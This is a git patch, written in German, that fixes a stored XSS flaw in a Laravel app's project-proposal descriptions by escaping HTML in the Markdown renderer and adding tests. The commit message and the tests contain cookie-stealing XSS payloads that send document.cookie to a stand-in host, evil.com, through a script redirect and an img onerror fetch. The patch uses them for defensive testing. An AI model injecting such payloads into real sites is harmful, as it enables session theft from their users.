From af3090e6944c94d9f7e42540ca0d8431ebe093e1 Mon Sep 17 00:00:00 2001
From: vk <vk>
Date: Wed, 11 Feb 2026 20:41:10 +0100
Subject: [PATCH] =?UTF-8?q?[P0=20Security]=20XSS-Schutz=20=E2=80=93=20Sani?=
 =?UTF-8?q?tize=20ProjectProposal=20Description=20Output=20(vibe-kanban=20?=
 =?UTF-8?q?a733735a)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

## Security Audit: Cross-Site Scripting (XSS) in ProjectProposal Description

### Problem
In `resources/views/livewire/association/project-support/show.blade.php` Zeile 111 wird User-generierter Content **unescaped** ausgegeben:

```blade
<x-markdown>
    {!! $projectProposal->description !!}
</x-markdown>
```

**Angriffsvektor:** Jeder authentifizierte User mit `association_status > 1` und bezahlter Mitgliedschaft kann über `resources/views/livewire/association/project-support/form/create.blade.php` einen ProjectProposal erstellen. Das Feld `description` wird nur mit `required|string|min:5` validiert – kein HTML-Sanitizing. Ein Angreifer kann beliebiges JavaScript injizieren:

```html
<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
<img src=x onerror="fetch('https://evil.com/'+document.cookie)">
```

Die App nutzt Spatie's `laravel-markdown` (League\CommonMark), das standardmäßig inline HTML **nicht** filtert.

### Lösung

**Option A (empfohlen): HTML Purifier im Markdown-Renderer konfigurieren**
1. In `config/markdown.php` die CommonMark-Konfiguration anpassen, um `allow_unsafe_links` auf `false` zu setzen und `html_input` auf `'escape'` oder `'strip'`
2. Prüfe die aktuelle `config/markdown.php` – dort wird der `Spatie\LaravelMarkdown\MarkdownRenderer` konfiguriert
3. Setze in der CommonMark-Konfiguration:
   ```php
   'commonmark' => [
       'html_input' => 'escape', // oder 'strip' – verhindert rohen HTML-Output
       'allow_unsafe_links' => false,
   ],
   ```

**Option B: Input-Sanitization bei Speicherung**
1. In `app/Livewire/Forms/ProjectProposalForm.php` (oder dem Create-Component) vor dem Speichern den HTML-Content mit `strip_tags()` oder besser einem HTML Purifier bereinigen
2. Das Flux `<flux:editor>` Component erzeugt möglicherweise gültiges HTML – prüfe, welches Format in der DB gespeichert wird

**Option C: Output-Escaping**
1. Ersetze `{!! $projectProposal->description !!}` durch `{{ $projectProposal->description }}` wenn nur Plain-Text benötigt wird
2. Falls Markdown benötigt wird, nutze die sichere Markdown-Rendering-Pipeline

### Betroffene Dateien
- `resources/views/livewire/association/project-support/show.blade.php:111` – XSS-Output
- `resources/views/livewire/association/project-support/form/create.blade.php` – Input ohne Sanitization
- `app/Livewire/Forms/ProjectProposalForm.php` – Validation Rules (falls vorhanden)
- `config/markdown.php` – CommonMark Konfiguration

### Zusätzlich prüfen
Scanne alle anderen `{!! !!}` Stellen in `resources/views/livewire/` (NICHT in `resources/views/flux/` – das sind Framework-Dateien). Aktuell ist nur `show.blade.php:111` betroffen, aber prüfe ob es weitere gibt.

### Vorgehen
1. `config/markdown.php` lesen und die CommonMark-Config auf `'html_input' => 'escape'` setzen
2. Prüfen, ob die Änderung den gewünschten Effekt hat (Markdown wird gerendert, HTML wird escaped)
3. Einen Pest Browser-Test oder Feature-Test schreiben, der verifiziert, dass `<script>` Tags in der Description escaped werden
4. `vendor/bin/pint --dirty` ausführen
5. Bestehende Tests laufen lassen

### Akzeptanzkriterien
- `<script>` und andere HTML-Tags in ProjectProposal descriptions werden escaped oder gestrippt
- Markdown-Formatierung (Bold, Links, Listen) funktioniert weiterhin
- Ein Test verifiziert, dass XSS-Payloads nicht ausgeführt werden
- Keine Regression in der Darstellung bestehender Proposals
---
 config/markdown.php                         |  5 ++-
 tests/Feature/MarkdownXssProtectionTest.php | 40 +++++++++++++++++++++
 2 files changed, 44 insertions(+), 1 deletion(-)
 create mode 100644 tests/Feature/MarkdownXssProtectionTest.php

diff --git a/config/markdown.php b/config/markdown.php
index 16fb74a..98666ab 100644
--- a/config/markdown.php
+++ b/config/markdown.php
@@ -33,7 +33,10 @@ return [
      *
      * More info: https://spatie.be/docs/laravel-markdown/v1/using-the-blade-component/passing-options-to-commonmark
      */
-    'commonmark_options' => [],
+    'commonmark_options' => [
+        'html_input' => 'escape',
+        'allow_unsafe_links' => false,
+    ],
 
     /*
      * Rendering markdown to HTML can be resource intensive. By default
diff --git a/tests/Feature/MarkdownXssProtectionTest.php b/tests/Feature/MarkdownXssProtectionTest.php
new file mode 100644
index 0000000..eccce2f
--- /dev/null
+++ b/tests/Feature/MarkdownXssProtectionTest.php
@@ -0,0 +1,40 @@
+<?php
+
+use Spatie\LaravelMarkdown\MarkdownRenderer;
+
+it('escapes script tags in markdown output', function () {
+    $renderer = app(MarkdownRenderer::class);
+
+    $html = $renderer->toHtml('<script>alert("xss")</script>');
+
+    expect($html)->not->toContain('<script>');
+    expect($html)->toContain('&lt;script&gt;');
+});
+
+it('escapes img onerror XSS payloads in markdown output', function () {
+    $renderer = app(MarkdownRenderer::class);
+
+    $html = $renderer->toHtml('<img src=x onerror="fetch(\'https://evil.com/\'+document.cookie)">');
+
+    expect($html)->not->toContain('<img ');
+    expect($html)->toContain('&lt;img');
+});
+
+it('blocks javascript: protocol links in markdown output', function () {
+    $renderer = app(MarkdownRenderer::class);
+
+    $html = $renderer->toHtml('[click me](javascript:alert("xss"))');
+
+    expect($html)->not->toContain('javascript:');
+});
+
+it('still renders valid markdown formatting', function () {
+    $renderer = app(MarkdownRenderer::class);
+
+    $html = $renderer->toHtml("**Bold text** and [a link](https://example.com)\n\n- Item 1\n- Item 2");
+
+    expect($html)->toContain('<strong>Bold text</strong>');
+    expect($html)->toContain('<a href="https://example.com">a link</a>');
+    expect($html)->toContain('<li>Item 1</li>');
+    expect($html)->toContain('<li>Item 2</li>');
+});